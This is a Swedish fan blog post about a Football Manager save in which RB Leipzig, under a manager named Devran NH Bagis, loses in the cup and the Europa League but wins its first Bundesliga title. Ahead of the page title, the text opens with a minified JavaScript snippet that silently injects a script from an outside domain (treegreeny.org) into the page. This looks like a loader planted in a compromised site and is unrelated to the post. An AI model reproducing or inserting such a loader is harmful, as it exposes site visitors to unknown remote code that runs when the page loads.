;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vi rustar upp – FMSweden
Meny Stäng

Vi rustar upp

Säsongen avslutades i dur, men det var saker längs vägen som inte alls blev som vi hade tänkt. Nu är det dags att på allvar blanda sig racet för de Europeiska titlarna, annars är Danne nog beredd att ge Devran NH Bagis sparken, både från agenturen och från FM. 

RB Leipzig fortsatte under våren att gå som tåget i ligaspelet. Tillsammans med Dortmund och Hoffenheim, var det ett drama in de sista omgångarna. Inför 32:a av 34 omgångar ledde Dortmund ligan enbart på målskillnad. Dortmund hade kvar att möta Hoffenheim (h) och Hannover (b), medan RBL skulle spela mot Schalke 04 (h) och Bayer Leverkusen (b).

I tyska cupen blev det inget vidare facit för annars så cupskickliga Bagis. Redan i första matchen, där det mönstrades ett reservbetonat lag mot Mainz hemma, blev det respass efter straffar. Ett oväntat resultat och därmed var raden av fyra raka cupvinster bruten för turkiske demonen.

I Europa League var det som sagt AS Monaco som var motståndet. Bara dagarna innan bortamatchen, krockade Djordje Fratrovic och Dejan Nikolic på träning. Både lagets bästa målskytt och lagets målvakt var därmed indisponibla i den första matchen. Det visade sig bli riktigt kostsamt.

Bernd Leno var reservkeeper och mycket kan man säga om honom, men i den här matchen var det tydligt att 36-årige Leno hade sett sina bästa dagar.

(ber om ursäkt för kvalitén)

Detta självmål gav till slut Monaco en 3-0 seger i Frankrike och det var inte mycket som talade för att RBL skulle kunna vända på det.

I hemmamatchen gjorde Bagis mannar en heroisk insats och vann matchen med 3-0. Efter 25 avslut på mål, fick man dock se Monacos duktige målvakt ta matchen till straffar. Där blev Matías Antúnez syndabock, då underbarnet från Uruguay var den enda spelaren som missade en straff. En riktig missräkning för tyskarna och Bagis, som hade räknat med att gå långt i turneringen.

I ligan var det som sagt två matcher kvar. Både Dortmund och RBL vann sina nästa sista matcher och det bäddade för en ligaavslutning där Dortmund ledde ligan på målskillnad före RB Leipzig.

Devran Bagis mannar gjorde sitt jobb mot Leverkusen och vann programenligt med 3-1. Djordje Fratrovic gjorde två mål och vann skytteligan i Bundesliga med sina 34 mål.

Då var det Hannover som behövde vinna mot Dortmund, för att RBL skulle få sitt första ligaguld någonsin.

Sead Haksabanovic gjorde 2-1 för Hannover i den 59:e minuten och det resultatet stod sig hela vägen in i mål.

RasenballSport Leipzig var tyska mästare för första gången i historien. Devran NH Bagis hade gjort det igen. 

Champions League var säkrat sedan länge och nu var det dags för Danne att göra RBL slagkraftiga inför kommande säsong. Hur det gick får ni veta nästa vecka!!

Trevlig helg kamrater

SKÅL

Tobbe

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar